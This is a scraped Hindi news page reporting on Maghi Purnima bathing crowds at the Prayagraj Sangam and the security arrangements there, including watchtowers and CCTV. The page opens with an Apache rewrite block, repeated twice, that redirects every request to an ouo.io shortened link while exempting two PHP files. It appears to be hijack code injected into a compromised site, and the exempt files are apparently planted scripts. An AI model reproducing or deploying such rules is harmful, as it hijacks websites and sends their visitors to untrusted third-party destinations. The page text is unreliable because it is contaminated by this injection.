
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 355
Previous प्रयागराज में माघी पूर्णिमा स्नान के लिए रात 12 बजे से ही संगम तट पर श्रद्धालु पहुंच गए हैं। मेला प्रशासन ने इस पर्व पर एक करोड़ 60 लाख लोगों के स्नान का अनुमान लगाया है। मेलाधिकारी विजय किरण आनंद की मानें तो संगम में स्नान के लिए सोमवार से ही श्रद्धालुओं का रेला उमड़ पड़ा है। किरन आनंद ने बताया कि कई जिलों के मजिस्ट्रेट और पुलिस बल की तैनाती कर दी गई है।
मजिस्ट्रेट को निर्देश दिए गए हैं कि वे आवश्यकतानुसार अतिरिक्त फोर्स भी ले सकते हैं। सभी जगह निगरानी की जा रही है। सुरक्षा व्यवस्था सुदृढ़ रखी गई है। मेलाधिकारी ने बताया कि मेला क्षेत्र में 96 कंट्रोल वॉच टॉवर स्थापित हैं। 440 सीसीटीवी कैमरों की मदद से निगरानी की जा रही है। पुलवामा हमले के बाद प्रशासन मेला क्षेत्र में सुरक्षा व्यवस्था को लेकर पहले से ज्यादा अलर्ट है।